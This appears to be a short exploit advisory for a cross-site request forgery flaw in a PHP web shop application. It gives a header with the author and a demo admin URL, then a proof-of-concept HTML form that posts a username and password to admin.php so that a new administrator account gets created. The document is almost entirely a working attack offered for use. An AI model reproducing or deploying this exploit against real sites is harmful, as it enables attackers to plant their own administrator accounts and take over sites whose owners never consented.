< ------------------- header data start ------------------- >
#############################################################
# Application Name : Multi Languages PHP
# Vulnerable Type : CSRF
# Demo : http://webbdomain.com/php/webshopir/admin/admin.php
# Author : Jonturk75
#############################################################
< ------------------- header data end of ------------------- >
<form action=admin.php method=post><input type=text name=username size=10>
<input type=password name=password size=10>
<input type=submit value=Add admin name=submit>
</form>
< -- bug code end of -- >